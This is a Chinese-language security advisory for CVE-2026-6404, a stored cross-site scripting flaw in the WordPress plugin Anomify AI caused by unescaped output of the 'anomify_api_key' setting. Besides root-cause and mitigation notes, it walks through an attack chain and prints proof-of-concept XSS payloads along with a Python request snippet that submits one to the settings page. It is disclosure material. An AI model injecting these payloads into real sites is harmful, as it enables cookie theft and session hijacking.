CVE-2026-6404 CVSS 4.4 中危

CVE-2026-6404: Anomify插件存储型XSS漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6404

漏洞类型

存储型XSS

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Anomify AI – Anomaly Detection and Alerting

漏洞概述

WordPress插件Anomify AI在0.3.6及以下版本中存在存储型XSS漏洞。由于'anomify_api_key'参数输入清理不足且输出转义缺失，拥有管理员权限的攻击者可在设置页面注入恶意脚本。当其他用户访问该页面时，脚本将被触发，造成敏感信息泄露或会话劫持。

技术细节

该漏洞源于插件对'anomify_api_key'参数的输入验证和输出编码机制存在缺陷。插件虽然使用了sanitize_text_field()对输入进行过滤，但该函数仅移除HTML标签，未对双引号字符进行HTML实体编码。在输出环节，该值被直接回显到HTML标签的属性值（value="..."）中，且未使用WordPress标准的esc_attr()函数进行转义。因此，具有管理员级别的攻击者可以构造包含双引号闭合符和恶意JavaScript脚本的Payload。一旦Payload被保存，任何访问插件设置页面的用户都会触发脚本执行，从而可能窃取Cookie或进行进一步的钓鱼攻击。这种利用方式属于典型的存储型跨站脚本攻击，利用了上下文相关的转义缺失问题。

攻击链分析

STEP 1

攻击者获取WordPress管理员级别的账户凭证（漏洞利用的前提条件）。

STEP 2

攻击者登录后台并访问Anomify插件的设置页面。

STEP 3

攻击者在'anomify_api_key'输入框中构造并输入特制的XSS Payload（如：\"><script>alert(1)</script>），然后保存设置。

STEP 4

插件将未正确转义的Payload存储在数据库中。

STEP 5

当其他管理员或用户访问该插件设置页面时，页面加载并解析恶意脚本。

STEP 6

恶意脚本在受害者浏览器中执行，可能导致Cookie窃取或账户被接管。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-6404
Inject the following payload into the 'anomify_api_key' parameter:
-->
"><script>alert('XSS');</script>

<!--
Alternatively, if the context is strictly within an attribute value:
-->
" onmouseover="alert(1)

<!--
Python snippet to simulate the request (requires admin auth):
-->
import requests

url = 'http://target-wordpress-site/wp-admin/admin.php?page=anomify-settings'
payload = '"><script>alert(document.cookie)</script>'

data = {
    'anomify_api_key': payload,
    'option_page': 'anomify_options',
    'action': 'update',
    '_wpnonce': 'valid_nonce_here' # Need valid nonce
}

# Attacker sends this POST request
# response = requests.post(url, data=data, cookies=admin_cookies)

影响范围

Anomify AI – Anomaly Detection and Alerting <= 0.3.6

防御指南

临时缓解措施

建议立即检查并更新Anomify AI插件至最新修复版本。如果暂时无法更新，应考虑暂时禁用该插件以防止攻击利用。同时，加强管理员账户的安全防护，防止凭证泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表